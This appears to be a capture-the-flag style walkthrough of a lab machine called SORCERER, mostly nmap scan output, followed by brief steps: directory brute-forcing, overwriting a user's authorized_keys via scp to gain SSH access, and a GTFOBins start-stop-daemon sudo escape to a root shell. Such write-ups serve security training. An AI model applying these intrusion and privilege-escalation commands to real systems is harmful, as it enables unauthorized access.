1.Reconnaissance

sudo ./nmapAutomator.sh 192.168.185.100 all

Running all scans on 192.168.185.100

Host is likely running Unknown OS!

———————Starting Port Scan———————–

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs

———————Starting Script Scan———————–

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 812a4224b590a1ce9bace74e1d6db4c6 (RSA)
| 256 d0732a05527f89093776e356c8ab2099 (ECDSA)
|_ 256 3a2dde33b01ef2350f8dc8d78ff9e00e (ED25519)
80/tcp open http nginx
|_http-title: Site doesn’t have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS Detection modified to: Linux

———————Starting Full Scan————————

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
7742/tcp open msss
33603/tcp open unknown
41637/tcp open unknown
42193/tcp open unknown
59253/tcp open unknown

Making a script scan on extra ports: 7742, 33603, 41637, 42193, 59253

PORT STATE SERVICE VERSION
7742/tcp open http nginx
|_http-title: SORCERER
33603/tcp open mountd 1-3 (RPC #100005)
41637/tcp open mountd 1-3 (RPC #100005)
42193/tcp open nlockmgr 1-4 (RPC #100021)
59253/tcp open mountd 1-3 (RPC #100005)

———————-Starting UDP Scan————————

PORT STATE SERVICE
111/udp open rpcbind
2049/udp open nfs

Making a script scan on UDP ports: 111, 2049

PORT STATE SERVICE VERSION
111/udp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/udp open nfs_acl 3 (RPC #100227)

———————Starting Vulns Scan———————–

Running CVE scan on all ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
80/tcp open http nginx
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7742/tcp open http nginx
33603/tcp open mountd 1-3 (RPC #100005)
41637/tcp open mountd 1-3 (RPC #100005)
42193/tcp open nlockmgr 1-4 (RPC #100021)
59253/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running Vuln scan on all ports
This may take a while, depending on the number of detected services..

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2019-16905 4.4 https://vulners.com/cve/CVE-2019-16905
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
80/tcp open http nginx
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7742/tcp open http nginx
| http-enum:
| /default/: Potentially interesting folder
|_ /zipfiles/: Potentially interesting folder w/ directory listing
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
33603/tcp open mountd 1-3 (RPC #100005)
41637/tcp open mountd 1-3 (RPC #100005)
42193/tcp open nlockmgr 1-4 (RPC #100021)
59253/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Start to scan port 80,find nothing,and then scan port 7742

But we don’t have any useful Creds,then use

feroxbuster --url "http://192.168.185.100:7742"

and access these file url and download

Since we can see scp is being used in this process, I wanted to attempt to modify the authorized key to avoid using the scp_wrapper script and simply login using ssh. I modified the authorized_keys file and removed all portions that called that script. You can see this below in the screenshot.

sudo scp -O authorized_keys max@192.168.245.100:/home/max/.ssh/authorized_keys

2.Foothold

sudo scp -O authorized_keys max@192.168.245.100:/home/max/.ssh/authorized_keys

3.Privilege Escalation

Once I logged into the host, I uploaded linenum on the host and ran the script to begin privilege escalation.

I used the information from GTFObins and ran the command. As we can see, we successfully leveraged the service to get full root level access

sudo /usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh